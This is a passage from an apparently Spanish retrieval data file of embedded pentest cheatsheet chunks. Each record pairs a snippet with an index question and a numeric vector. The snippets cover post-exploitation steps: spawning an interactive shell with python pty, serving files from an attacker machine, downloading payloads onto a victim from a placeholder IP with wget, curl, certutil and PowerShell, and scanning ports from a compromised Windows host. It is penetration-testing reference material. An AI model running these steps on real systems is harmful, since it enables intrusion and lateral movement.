-0.05567, 0.05878, 0.07522, -0.01761, 0.00619, 0.14506, -0.02399, 0.02092, -0.0455, 0.00186, 0.0492, 0.02966, -0.05265, -0.03662, 0.0105, -0.0502, 0.02985, 0.00431, -0.06504, 0.05172, 0.01152, 0.00805, 0.05903, -0.00462, -0.08135, -0.05081, -0.08745, -0.04541, 0.05499, -0.03829, 0.00379, -0.01074, -0.10177, 0.02416, -0.00738, 0.01773, -0.05015, 0.02553, -0.01488, -0.01371, -0.07017, -0.08601, 0.03489, -0.05875, -0.05099, -0.04538, 0.12762, 0.01323, 0.00994, 0.04629, 0.05494, 0.02875, 0.019, -0.03626, 0.00826, -0.05893, -0.03129, -0.02184, -0.05407, -0.01911, 0.05736, -0.0249, -0.01439, -0.05125, -0.0353, 0.01631, -0.00799, 0.00545, 0.03253, 0.08167, -0.04417, -0.00229, 0.03371, -0.03572, 0.04444, 0.03595, 0.02359, -0.04845, -0.0133, 0.02848, 0.01411, -0.04467, 0.03834, 0.08462, -0.06247, -0.01705, 0.04213, 0.03272, 0.00337, -0.01863, 0.05082, 0.0362, 0.03458, -0.05826, -0.05107, 0.0792, 0.05667, -0.0044, -0.06395, -0.01443, 0.0262, 0.07528, 0.00281, -0.03788, 0.02067, -0.00205, 0.05296, -0.0275, -0.03216, -0.04546, -0.01666, -0.01721, 0.01902, -0.04989, -0.0089, -0.01105, -0.00593, -0.02235, -0.05078, 0.09436, 0.0284, -0.05775, -0.00915, 0.03944, -0.02377, 0.0058, -0.06058, 0.00529, -0.09259, 0.01229, 0.031, -0.07179, -0.00131, 0.0515]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Estabilizar la TTY tras coger la shell\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'", "indexar": "con que puedo iniciar un shell interactivo desde una script en python", "v": [0.10791, 0.04856, -0.14112, -0.09978, 0.04222, -0.23931, -0.1202, -0.08458, -0.02497, -0.0354, 0.04741, 0.04869, 0.06579, -0.07956, -0.08331, 0.0295, -0.09694, -0.04257, 0.04142, -0.02352, -0.07738, 0.06422, -0.11785, -0.06011, 0.02632, 0.09507, -0.0459, 0.07479, -0.09642, -0.02333, -0.06088, -0.01446, 0.11037, -0.02717, -0.08217, -0.13953, 0.10069, 0.11553, 0.05646, 0.14676, -0.17297, -0.02997, -0.06659, 0.13708, 0.05415, 0.02523, 0.04464, -0.02601, -0.01265, 0.02906, -0.02703, -0.11883, -0.12973, -0.06951, 0.02534, 0.09862, 0.13299, -0.15824, 0.12079, 0.03009, -0.11902, -0.00971, -0.01084, 0.05588, 0.07065, 0.02917, 0.00054, -0.10793, -0.13301, 0.09924, -0.01302, 0.05274, -0.13082, 0.0632, 0.03624, 0.04951, -0.15849, -0.10926, -0.04093, 0.0668, -0.07008, -0.1067, 0.0519, 0.06628, -0.06098, -0.16341, -0.01204, 0.00991, 0.05624, -0.01284, 0.03909, 0.01141, 0.04051, 0.0222, -0.04137, 0.02705, -0.01165, -0.03887, -0.02286, 0.03891, -0.03299, -0.01081, -0.01121, 0.0998, 0.03029, 0.04133, -0.03815, 0.09137, -0.02466, 0.02357, 0.05951, -0.04482, -0.03929, -0.02941, -0.07515, -0.05936, -0.10484, -0.03824, 0.03613, 0.01858, -0.04244, 0.04584, -0.12269, 0.07118, -0.00306, -0.00768, 0.0315, 0.06744, -0.052, 0.04975, -0.04054, 0.05796, -0.00433, -0.06564, -0.0298, 0.12418, 0.03167, 0.04225, -0.00326, -0.0298, -0.00661, 0.05568, 0.03361, 0.02732, 0.03835, -0.00682, -0.0512, -0.03747, -0.0642, 0.00193, 0.03996, 0.01406, 0.01092, 0.05833, -0.0564, -0.01276, 0.03269, 0.07271, 0.03736, -0.04036, 0.02581, 0.02909, -0.03925, -0.03415, 0.02981, -0.08675, -0.10399, -0.05669, 0.06263, 0.05036, -0.04377, 0.07318, 0.06558, -0.03145, 0.03685, -0.03154, -0.00151, -0.03516, -0.06071, -0.046, 0.03631, -0.02347, -0.02752, -0.04235, 0.02695, -0.02166, 0.01025, -0.02435, -0.05633, 0.01622, 0.0322, 0.11507, -0.0421, -0.01612, 0.02597, 0.00391, 0.0401, -0.00353, 0.03687, 0.00132, 0.0087, 0.09947, -0.02678, -0.01534, 0.02964, 0.05287, -0.07502, 0.0177, 0.00345, -0.0345, 0.01903, 0.00229, 0.07205, 0.05976, 0.05475, -0.00548, 0.0185, 0.04253, 0.04737, 0.00938, 0.00836, 0.04061, 0.05443, 0.00747, -0.0148, -0.05838, 0.0428, -0.00883, 0.02122, -0.00114, -0.04396, -0.00599, -0.01868, -0.00711, -0.00809, -0.00883, 0.02389, -0.05613, -0.06272, 0.03816, -0.04005, 0.07614, -0.00843, -0.0723, -0.02061, -0.00058, -0.02596, -0.00687, -0.05007, -0.03039, -0.05088, 0.00337, 0.05721, -0.02159, -0.03844, 0.00608]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Servir desde el atacante\npython3 -m http.server 80\nimpacket-smbserver share $(pwd) -smb2support # SMB", "indexar": "que programa puedo servir archivos HTTP usando Python?", "v": [-0.07861, -0.05416, -0.10006, -0.25806, -0.00677, -0.17769, -0.01602, -0.0921, -0.03015, 0.05017, -0.05116, 0.05069, 0.01039, 0.00593, -0.09127, -0.02161, 0.07234, -0.10739, 0.14961, -0.06543, -0.07034, 0.07301, -0.1152, -0.11463, 0.04447, 0.01267, 0.05271, 0.09085, -0.09379, -0.04222, 0.06681, 0.022, -0.01059, 0.11463, -0.14608, 0.01519, -0.00288, 0.14748, -0.04242, 0.0581, -0.04145, 0.00092, -0.05174, 0.08697, -0.13167, -0.00386, 0.06239, -0.10029, -0.00465, -0.08447, -0.00656, -0.13192, -0.15607, 0.07698, 0.0068, 0.02492, 0.00684, -0.14961, -0.00121, -0.01355, -0.05535, -0.05508, 0.05756, 0.01331, -0.02473, -0.02901, -0.00323, 0.03429, -0.16963, 0.12805, -0.06909, 0.10778, 0.06213, -0.01692, 0.07073, 0.0398, -0.10072, -0.0604, -0.05233, 0.02083, -0.05087, -0.07675, 0.0089, 0.07438, -0.08557, -0.09889, -0.01694, -0.05363, 0.09843, -0.05583, 0.11633, 0.14844, -0.01556, 0.02272, 0.0176, -0.00803, 0.12155, -0.03493, 0.06333, 0.00395, 0.00191, 0.01573, -0.03549, 0.13158, 0.04224, 0.13307, 0.07752, 0.03787, -0.04822, -0.06332, 0.07795, 0.00145, -0.05741, 0.00066, -0.08691, -0.05488, -0.01346, 0.01075, 0.02327, -0.05433, -0.04801, 0.03868, -0.1085, 0.08476, 0.02614, 0.01186, 0.02735, 0.13765, -0.06202, 0.03554, 0.01117, 0.00909, -0.06684, 0.05075, -0.1034, 0.04717, 0.12681, -0.05393, 0.01181, -0.006, -0.02457, 0.02911, -0.03487, 0.06541, 0.07211, -0.00452, 0.0283, -0.0691, -0.0585, -0.05895, 0.05037, -0.0042, -0.05182, 0.02192, -0.1068, -0.03648, -0.03975, -0.09884, -0.07305, -0.00661, 0.0163, -0.00172, -0.00043, -0.01712, 0.05808, -0.00248, -0.02991, 0.07151, 0.08777, 0.00979, 0.03247, 0.06345, 0.01387, -0.08985, -0.03928, -0.03569, -0.03401, -0.02994, 0.02448, -0.0115, -0.03902, -0.03774, 0.00102, -0.00246, 0.0219, -0.03256, 0.03749, 0.03519, -0.01493, 0.01046, -0.01781, 0.03517, -0.0747, 0.01811, 0.01018, 0.01185, -0.04495, 0.02373, 0.04863, -0.02903, -0.00959, -0.00961, -0.00594, 0.00643, 0.01866, 0.05613, -0.03839, -0.02337, 0.00997, -0.02555, 0.01476, -0.03256, 0.07645, -0.01057, 0.04663, -0.01224, 0.00862, 0.061, 0.03847, 0.01489, -0.05845, 0.00671, 0.04757, 0.05868, 0.03078, -0.03652, 0.04944, -0.04392, 0.01216, -0.02587, -0.07095, -0.03498, -0.03725, 0.00608, 0.04529, -0.02017, -0.04931, 0.00643, -0.03849, -0.05362, -0.03489, 0.06392, -0.02831, -0.04881, -0.0003, -0.01926, -0.05286, -0.00594, -0.00489, 0.03229, -0.04058, 0.00886, 0.00691, -0.05413, -0.00311, 0.07285]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Servir desde el atacante\npython3 -m http.server 80\nimpacket-smbserver share $(pwd) -smb2support # SMB", "indexar": "cual herramienta me sirve para compartir carpetas SMB con soporte SMB2?", "v": [0.08337, -0.05812, -0.20528, -0.14387, -0.07306, -0.23912, -0.16827, -0.09468, -0.02798, 0.00597, -0.1875, 0.04012, 0.101, -0.1619, -0.01275, 0.15416, 0.03191, -0.14629, -0.05407, 0.03119, 0.19208, 0.01374, -0.03383, -0.07996, -0.07551, 0.02871, 0.13024, 0.06673, -0.10196, 0.02809, -0.00599, 0.0223, 0.0204, -0.02948, -0.0534, -0.09927, -0.08418, -0.01507, -0.04675, 0.01697, 0.03513, -0.01805, 0.0395, -0.00212, 0.02269, -0.04672, -0.03881, 0.01987, -0.0811, 0.1009, -0.07824, -0.1178, -0.07852, -0.02421, -0.14294, -0.11636, 0.19593, -0.18153, -0.02498, -0.03251, -0.09346, 0.02137, -0.04027, -0.0458, 0.00176, -0.10261, -0.02269, -0.00565, -0.12825, 0.06709, -0.07969, 0.13043, 0.1441, -0.05911, -0.07759, 0.07459, 0.03525, -0.00853, 0.00579, -0.00447, 0.07429, 0.00599, -0.01647, 0.08468, 0.06133, -0.07574, 0.02904, -0.03059, -0.01481, -0.05835, -0.04073, 0.04527, -0.03118, 0.05983, -0.01723, -0.03387, -0.00892, -0.01321, 0.06854, -0.0143, 0.10151, -0.0053, -0.08639, 0.01703, -0.05033, 0.01674, -0.01632, -0.04079, -0.03873, -0.02085, 0.11211, 0.11347, 0.01296, 0.10033, -0.03831, -0.02237, 0.00121, -0.04641, 0.01197, 0.03076, 0.05695, 0.02561, -0.05072, -0.00339, 0.00218, -0.0089, 0.05415, 0.05337, -0.04035, -0.02844, -0.05148, -0.00046, 0.03768, 0.04002, -0.02407, -0.02775, -0.00051, -0.07236, -0.00682, -0.06696, 0.032, 0.0071, -0.02957, -0.06445, -0.01476, 0.02247, 0.07335, -0.03883, 0.01612, -0.02367, 0.06739, -0.04054, -0.01923, -0.00116, -0.00634, -0.00427, -0.00538, 0.04196, -0.12473, 0.01059, -0.06831, -0.06063, 0.06501, 0.04106, -0.00883, -0.01958, -0.00787, -0.01858, 0.05623, 0.06644, -0.00481, 0.00493, 0.06517, -0.03666, -0.02254, -0.12176, 0.01215, -0.00202, 0.01153, -0.02368, -0.03127, -0.01377, 0.0153, 0.06035, 0.00923, -0.06034, 0.0156, 0.01674, -0.00978, 0.01287, 0.02964, 0.07705, 0.01398, -0.02176, -0.03679, -0.02459, 0.00761, -0.02743, 0.03999, 0.02269, -0.09917, 0.01428, -0.12658, -0.05299, 0.05228, 0.0482, -0.0177, -0.03096, 0.0282, 0.00784, 0.00094, 0.03108, 0.01687, -0.03784, -0.01201, -0.01627, 0.00686, 0.07395, 0.07466, -0.04385, 0.02842, -0.01792, 0.03026, 0.00071, 0.00754, 0.04391, -0.00934, -0.00247, -0.02078, -0.04099, 0.02033, -0.00556, 0.03389, 0.00909, 0.03702, -0.0271, -0.02399, -0.05939, 0.00406, 0.00034, -0.07384, -0.01889, -0.01372, -0.02514, -0.02485, -0.01106, -0.05378, -0.03283, -0.05196, -0.05717, -0.01469, -0.03594, 0.01552, -0.01999, -0.01485, 0.00186]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Servir desde el atacante\npython3 -m http.server 80\nimpacket-smbserver share $(pwd) -smb2support # SMB", "indexar": "con que puedo montar un servidor HTTP sencillo desde la terminal?", "v": [-0.04419, 0.01561, -0.17283, -0.17631, -0.11052, -0.10116, -0.03676, -0.01694, 0.05343, 0.08897, -0.18493, 0.05699, 0.1305, -0.02197, 0.08616, 0.07947, 0.07717, -0.15402, 0.11053, -0.0281, 0.00431, 0.0168, 0.02135, -0.02417, -0.01325, -0.00076, 0.02536, -0.01228, -0.13949, -0.16517, 0.07779, -0.07159, 0.00727, 0.11866, -0.02586, -0.06796, -0.04456, 0.11994, -0.03292, 0.03587, 0.02276, -0.02906, -0.02419, 0.07363, -0.04272, -0.01019, 0.07031, -0.13554, 0.09281, -0.0935, 0.04672, -0.03655, -0.18821, 0.0703, -0.08905, 0.1032, 0.12645, -0.16012, 0.0821, -0.0826, -0.05844, 0.03224, 0.0025, 0.05437, 0.06311, -0.00598, -0.05644, 0.05512, -0.12065, -0.00418, -0.05654, 0.03988, 0.01276, -0.01985, 0.06826, 0.08723, -0.05279, -0.03146, 0.06702, 0.10075, 0.05472, -0.00657, -0.01312, 0.06468, -0.07675, -0.10037, -0.0726, -0.02511, 0.08965, 0.02285, 0.1447, 0.06697, -0.05469, 0.01509, -0.05415, -0.1168, 0.02488, 0.00354, -0.00509, -0.04593, -0.01129, 0.10718, -0.02106, 0.09024, 0.09754, 0.06042, 0.10794, -0.05027, 0.03429, -0.11107, 0.06318, -0.02321, -0.0215, 0.01349, -0.07065, -0.06459, 0.0084, 0.05607, -0.01221, -0.00626, -0.05964, -0.05369, -0.02168, 0.05479, 0.02858, -0.03643, 0.04967, 0.04699, 0.05122, -0.01157, -0.00203, -0.05525, -0.01955, 0.02764, -0.0402, 0.06914, 0.07644, -0.14463, -0.0397, 0.03227, 0.00234, 0.02204, -0.07684, -0.04362, 0.11911, 0.02186, 0.02354, -0.07176, -0.04408, -0.01475, 0.06892, 0.00132, -0.10021, -0.02121, -0.12257, -0.01674, 0.05475, -0.05387, -0.04465, 0.09334, 0.01123, 0.02435, -0.01878, 0.07211, 0.01055, 0.04323, -0.11826, 0.03447, 0.07187, -0.00934, -0.01289, 0.05044, -0.00505, -0.06774, 0.01159, -0.00768, -0.09891, -0.01846, 0.01295, 0.00737, -0.0321, -0.03285, -0.02075, 0.02716, -0.03289, -0.05742, 0.04675, 0.00671, 0.00912, 0.0267, 0.04972, 0.01849, -0.08988, 0.09216, 0.06901, -0.0148, -0.01507, -0.02647, -0.01448, -0.01321, -0.04664, -0.03627, 0.06263, -0.05717, 0.00941, -0.01759, -0.04844, 0.03229, 0.00542, 0.01188, -0.02161, -0.02856, 0.0579, -0.05268, 0.01908, -0.00623, 0.05107, -0.00832, -0.03189, 0.04071, -0.01221, 0.00244, 0.02143, 0.02152, 0.02592, 0.02833, 0.03497, -0.00393, 0.05884, -0.01605, -0.05446, 0.01261, -0.04861, -0.02426, 0.04946, -0.01439, 0.00572, -0.00821, -0.04878, -0.03422, 0.0359, 0.0484, -0.01298, -0.04517, -0.01499, -0.07627, -0.03791, -0.01927, -0.02739, 0.00928, -0.05099, -0.04563, 0.01268, -0.03318, -0.05405, -0.01734]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Recibir en la victima\nwget http://TU_IP/file -O /tmp/file\ncurl http://TU_IP/file -o /tmp/file\ncertutil -urlcache -f http://TU_IP/file file.exe # Windows\npowershell iwr http://TU_IP/file -OutFile file # Windows\n```", "indexar": "quΓ© herramienta sirve para descargar archivos de una IP", "v": [-0.05848, 0.00163, -0.11121, -0.23011, 0.08113, -0.24869, -0.06337, -0.04438, -0.03336, 0.00028, 0.00657, -0.11454, -0.00911, -0.09094, -0.00091, 0.06883, 0.11133, -0.07544, 0.07461, -0.06953, -0.01845, 0.1603, -0.13606, -0.08683, -0.12836, 0.04775, -0.06234, 0.11094, -0.2138, -0.0494, -0.12634, -0.0587, 0.01875, -0.0394, -0.19538, -0.08402, 0.05862, 0.11175, -0.06918, 0.04843, 0.04231, 0.03989, -0.07317, 0.07624, -0.0184, -0.00693, 0.06664, -0.04582, 0.04314, 0.02862, -0.09314, -0.17454, 0.02138, 0.01974, -0.11158, -0.07735, 0.06906, -0.17527, 0.01649, -0.04993, -0.1403, 0.11503, -0.09668, -0.07416, -0.02358, -0.05154, -0.0894, 0.02855, -0.11756, -0.00609, 0.05087, 0.05911, 0.04462, 0.0391, -0.0387, 0.0032, 0.00572, -0.04649, -0.00851, -0.02091, 0.13166, 0.01145, -0.0874, -0.0257, -0.07463, -0.095, 0.09476, -0.05309, 0.06395, -0.08307, 0.01556, 0.08967, -0.0105, 0.0125, 0.01873, -0.03177, 0.09391, -0.00731, -0.00165, -0.01574, 0.04467, -0.03014, -0.04786, 0.06468, 0.06916, 0.06816, -0.00509, 0.05199, -0.02302, -0.02583, 0.0165, 0.05435, 0.05209, 0.07021, -0.02597, 0.05759, 0.01539, -0.06504, -0.03898, -0.03467, 0.02472, 0.06824, -0.06276, -0.01396, 0.00498, 0.00477, 0.00918, 0.09037, -0.05421, -0.02735, 0.05422, -0.06886, -0.11251, 0.06632, -0.02029, -0.0735, 0.05813, -0.0742, -0.0761, -0.0297, 0.08748, -0.02994, -0.06025, -0.02622, 0.07235, -0.01764, 0.02845, -0.02469, 0.01406, -0.10048, 0.04795, -0.05363, 0.01706, -0.05421, -0.0721, 0.02452, -0.00906, -0.05257, -0.06409, 0.01001, -0.06484, -0.03993, 0.04765, -0.0018, -0.01106, -0.04681, -0.00046, 0.05684, 0.08436, 0.04998, 0.0596, 0.00141, 0.01848, -0.08211, -0.03655, -0.0384, -0.03503, -0.00764, 0.01537, -0.06194, -0.04003, -0.0278, 0.01124, 0.01602, 0.01747, -0.01236, 0.06725, -0.0108, -0.0154, 0.04135, 0.00377, 0.01963, -0.03696, -0.01949, 0.02668, -0.00789, -0.04728, -0.05368, 0.0092, -0.03534, -0.05392, -0.07223, -0.05775, 0.02395, 0.06034, 0.01022, 0.01241, -0.03229, 0.01959, -0.0074, -0.00288, 0.01829, 0.05315, -0.04186, 0.00856, -0.01082, 0.0121, 0.06521, 0.02968, -0.00864, 0.00117, -0.01536, 0.02993, -0.00222, -0.02628, 0.05113, -0.01327, -0.01724, -0.00467, -0.02303, 0.00458, 0.03313, -0.02508, -0.00924, 0.03459, -0.05939, 0.00039, 0.00344, -0.01712, -0.03647, -0.0359, 0.04577, 0.01593, -0.029, -0.0468, -0.04056, 0.02686, -0.02635, 0.02375, -0.05688, -0.04476, 0.02943, 0.02039, 0.04009, -0.00854, 0.02889]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Recibir en la victima\nwget http://TU_IP/file -O /tmp/file\ncurl http://TU_IP/file -o /tmp/file\ncertutil -urlcache -f http://TU_IP/file file.exe # Windows\npowershell iwr http://TU_IP/file -OutFile file # Windows\n```", "indexar": "con quΓ© puedo montar un script de descarga simple", "v": [-0.06627, 0.17112, -0.24077, -0.10379, -0.19747, -0.06636, -0.06202, 0.05976, -0.10788, -0.12067, -0.09342, -0.0522, 0.06697, -0.10471, 0.04171, 0.04162, 0.04858, -0.04029, 0.05864, -0.01537, 0.02413, -0.08078, -0.03134, -0.19147, -0.04137, 0.03825, 0.01258, 0.0224, -0.19757, -0.02099, 0.01948, 0.12531, 0.0827, 0.06261, -0.04433, -0.01582, 0.10841, 0.00899, 0.08217, 0.0056, -0.03331, -0.02388, -0.01919, 0.1357, -0.08947, -0.04931, 0.10307, -0.07312, -0.00682, -0.00914, 0.12064, -0.00265, -0.02336, -0.0634, -0.11158, 0.02014, 0.06922, -0.17424, 0.07087, 0.05031, 0.02919, 0.1198, -0.04594, 0.05925, 0.08225, 0.03535, -0.00997, 0.02637, -0.13541, -0.06383, 0.01949, -0.04441, -0.10295, 0.01771, -0.01242, 0.08939, -0.11289, -0.13128, 0.01963, 0.03119, 0.05253, -0.06192, 0.00996, -0.0135, -0.03845, -0.07323, -0.04617, -0.07627, -0.00843, -0.01825, 0.10073, -0.01242, 0.04609, -0.01131, -0.03052, -0.12091, 0.02023, 0.11306, 0.01278, 0.03561, -0.15082, 0.00201, 0.02126, 0.12952, 0.07624, 0.01751, 0.03549, -0.01729, -0.04039, -0.08531, 0.03623, 0.02778, -0.08987, 0.09743, -0.10406, -0.09926, -0.01956, 0.04744, -0.05252, -0.047, -0.02178, 0.09293, -0.01506, 0.04543, -0.01692, -0.06148, 0.07572, 0.07982, -0.0814, -0.01849, -0.01405, -0.05461, -0.11267, -0.02238, -0.02012, 0.0014, 0.02567, -0.02786, -0.07954, -0.02197, 0.07041, -0.03629, -0.04103, -0.01571, -0.00779, -0.05564, 0.02502, -0.10942, 0.0387, -0.01854, 0.06838, 0.10301, -0.01224, -0.00933, -0.00663, -0.07685, 0.12471, 0.0079, 0.04742, 0.02506, -0.02585, 0.01882, -0.0286, -0.03146, 0.03357, -0.0453, -0.04193, -0.03648, 0.01436, 0.0575, -0.01464, 0.04636, 0.04011, -0.08557, 0.05479, -0.05828, -0.03962, -0.03676, -0.02601, -0.01337, -0.02046, 0.00495, 0.03397, 0.04805, -0.0469, 0.01699, 0.05651, -0.01555, -0.00599, 0.01022, 0.02102, 0.06009, -0.08754, 0.00199, 0.0479, 0.00367, 0.0034, 0.01239, 0.01752, 0.00207, -0.04753, -0.02946, 0.0425, -0.02265, 0.05982, -0.01665, -0.0293, 0.07298, 0.0037, 0.02064, 0.05641, 0.0105, 0.02241, -0.03298, 0.0321, 0.02117, 0.00229, 0.05006, -0.00161, 0.03422, -0.01985, 0.03039, 0.08344, 0.01006, -0.02888, 0.02876, 0.01057, 0.05532, 0.00372, 0.07511, 0.01771, 0.00084, -0.04701, -0.01463, 0.00223, 0.01056, -0.03569, 0.01539, -0.05322, -0.00492, 0.00259, 0.04591, 0.02209, -0.03454, -0.04927, -0.03276, -0.01123, 0.03448, -0.01996, -0.03232, -0.05155, -0.0016, -0.00801, -0.00937, -0.04524, -0.01323]} +{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Port scanner en PowerShell\n\n> Escanear puertos **desde la vΓ­ctima Windows sin nmap** (ΓΊtil tras un foothold para mirar la red interna, antes de montar Pivoting ligolo-ng). Usa Operadores PowerShell.", "indexar": "quΓ© programa puedo usar para escanear puertos desde una mΓ‘quina Windows sin instalar Nmap?", "v": [-0.01364, 0.00791, -0.13201, -0.15483, -0.01275, -0.09564, -0.03369, -0.14437, -0.15674, -0.06084, -0.13537, -0.0095, 0.00314, -0.07454, -0.12198, 0.02962, -0.00702, -0.07532, 0.08737, 0.11766, -0.08618, -0.05254, -0.05809, -0.01397, -0.04751, 0.1652, 0.00172, -0.05413, -0.20934, -0.0396, -0.02334, 0.07617, 0.10631, -0.08688, -0.01004, -0.1296, 0.05312, -0.05768, 0.10287, 0.04833, 0.05341, 0.07952, -0.0598, 0.041, 0.12447, -0.06589, 0.06011, -0.07804, 0.08345, -0.0596, -0.04069, 0.00539, -0.01881, 0.02917, 0.03524, -0.12615, 0.09437, -0.01735, 0.0211, -0.00397, -0.06429, 0.14742, -0.05042, 0.00563, -0.02483, -0.03194, 0.01318, 0.0222, -0.0926, 0.04731, -0.08807, 0.01558, 0.06376, 0.01825, 0.01776, 0.03371, -0.04887, -0.03261, 0.10435, 0.01424, 0.05892, 0.00321, -0.03821, -0.05368, -0.03066, -0.07794, 0.02163, -0.00426, 0.05796, -0.17211, 0.0152, -0.03671, -0.00839, 0.09972, 0.1012, -0.11475, 0.06815, 0.02716, 0.03754, 0.07028, 0.0723, -0.06964, -0.02836, 0.14885, -0.05742, 0.03469, 0.08227, -0.09124, -0.04217, -0.00965, 0.05062, 0.07962, -0.0907, -0.04662, -0.08122, -0.01485, 0.01245, -0.07214, -0.0424, 0.00838, -0.06755, 0.00722, -0.04384, 0.00347, 0.06248, -0.04204, 0.01252, 0.15887, -0.07387, 0.062, 0.05365, -0.03618, -0.03272, -0.0482, -0.11638, -0.04588, -0.00237, -0.11531, -0.00341, -0.06662, 0.02305, 0.11508, -0.02703, -0.00187, -0.0208, 0.03268, 0.02048, -0.04116, -0.04484, -0.03299, 0.09962, 0.01037, -0.05376, 0.05763, -0.08589, 0.02758, 0.11123, 0.03241, -0.03268, 0.00925, -0.05962, -0.00319, -0.03856, 0.00248, 0.05551, -0.02471, -0.0476, 0.02773, 0.05489, 0.04096, -0.00188, 0.13555, -0.00552, -0.06745, 0.05763, -0.01199, 0.031, -0.04154, -0.00793, -0.02153, -0.11322, 0.10828, 0.04427, -0.06981, -0.06176, -0.01738, -0.06614, -0.02029, -0.02516, 0.02659, -0.02198, 0.028, 0.00193, -0.05207, -0.00268, -0.03238, -0.03222, 0.00258, 0.0118, -0.03439, -0.06532, 0.03524, -0.05198, -0.04489, 0.10877, 0.07621, -0.06676, 0.00338, 0.04695, 0.09543, 0.01827, -0.02221, -0.00968, -0.01876, -0.02103, -0.04018, 0.00598, 0.04186, 0.04064, 0.02719, -0.01145, 0.00746, 0.00054, 0.05754, -0.01926, -0.06535, 0.00827, 0.04752, 0.03181, 0.03087, -0.00205, 0.02478, -0.01624, -0.04395, 0.01793, 0.00249, 0.00625, -0.03041, -0.02372, -0.05152, -0.03019, 0.06988, 0.0017, -0.07993, -0.02244, -0.03827, -0.0051, 0.00518, 0.00213, -0.02797, -0.01208, 0.06171, 0.04185, -0.05887, 0.00038, 0.06135]} +{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Port scanner en PowerShell\n\n> Escanear puertos **desde la vΓ­ctima Windows sin nmap** (ΓΊtil tras un foothold para mirar la red interna, antes de montar Pivoting ligolo-ng). Usa Operadores PowerShell.", "indexar": "con quΓ© herramienta puedo revisar los puertos abiertos de un equipo vulnerado usando PowerShell?", "v": [-0.01411, -0.03234, -0.25518, -0.13792, -0.01894, -0.00896, 0.01756, -0.11681, -0.02294, -0.23677, -0.1347, 0.05077, -0.02586, -0.06785, 0.05815, 0.03086, 0.05493, -0.04505, 0.02924, 0.00402, -0.05973, -0.08315, -0.16545, -0.09515, 0.02, 0.04502, 0.01212, 0.0326, -0.13513, -0.07614, -0.06585, 0.0438, 0.1022, -0.04181, -0.04827, -0.01968, -0.07224, 0.13302, 0.14284, 0.15376, 0.03152, 0.11466, -0.09992, -0.06163, 0.12157, -0.05501, -0.04299, -0.0965, -0.0221, 0.03014, -0.0528, -0.11765, -0.16244, -0.08253, -0.00787, -0.10299, 0.17426, -0.06329, 0.01075, -0.09619, -0.10742, 0.0422, 0.02293, -0.02012, -0.08407, -0.04605, -0.10384, -0.03079, -0.07764, 0.08283, -0.12244, -0.01963, 0.0271, 0.01557, -0.04487, -0.04592, 0.0622, 0.06834, 0.05028, 0.01713, -0.02058, 0.03757, -0.07434, -0.03548, -0.08315, -0.05068, -0.00813, -0.0098, 0.03211, -0.14022, 0.06009, 0.03132, -0.05477, 0.0569, -0.05755, 0.0474, 0.03991, 0.02021, -0.00468, 0.01603, 0.10963, 0.01443, -0.05322, 0.01853, 0.02885, 0.00368, -0.01944, -0.04834, 0.00777, 0.00942, 0.0803, 0.00271, 0.01098, -0.00711, 0.01222, 0.06884, -0.08144, -0.17718, -0.04416, -0.04141, 0.08523, -0.04561, -0.0706, -0.02025, 0.03668, -0.04295, 0.05519, 0.08568, 0.02237, -0.017, 0.04866, -0.05534, -0.07861, -0.00155, -0.07284, -0.05142, 0.00988, -0.05562, -0.03132, -0.02807, -0.08352, 0.09443, -0.02071, -0.03282, 0.06444, -0.04346, -0.05868, -0.00934, -0.05772, 0.03196, 0.03268, 0.00261, -0.01023, 0.05967, -0.07664, 0.05412, 0.0589, -0.02157, -0.12204, 0.02028, -0.09099, -0.04373, -0.00292, 0.03877, 0.04821, -0.06166, 0.02147, -0.00559, 0.0671, -0.02586, 0.02693, 0.02687, 0.0077, 0.00119, 0.00872, -0.03885, -0.03597, -0.00263, -0.06253, -0.01327, -0.05622, 0.00137, -0.07997, -0.05861, -0.05378, 0.01323, 0.00441, -0.07399, 0.00896, 0.05429, -0.00296, 0.03666, 0.05874, -0.1116, 0.0559, 0.00653, -0.02477, -0.01582, -0.01856, -0.00768, 0.01381, 0.01542, -0.00933, -0.00288, 0.04638, 0.06104, -0.06372, 0.00698, -0.03357, 0.05198, 0.05711, 0.00185, 0.06495, 0.0179, -0.04343, -0.01444, -0.04076, 0.03519, -0.00867, 0.06401, -0.02235, 0.05975, 0.02145, 0.00345, 0.03988, 0.0475, -0.00578, -0.00365, -0.01553, 0.03192, 0.05193, 0.00473, -0.05929, -0.01309, -0.00684, -0.04535, -0.02307, 0.02712, -0.04493, 0.01211, 0.03195, 0.01745, 0.01809, -0.01456, 0.00129, -0.03101, -0.00556, -0.0175, -0.01087, -0.05978, -0.04448, 0.05489, 0.01295, -0.09612, 0.01961, -0.04183]} +{"tipo": "pregunta", "herramienta": "Port scanner PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Port scanner PowerShell.md", "tema": "cheatsheets", 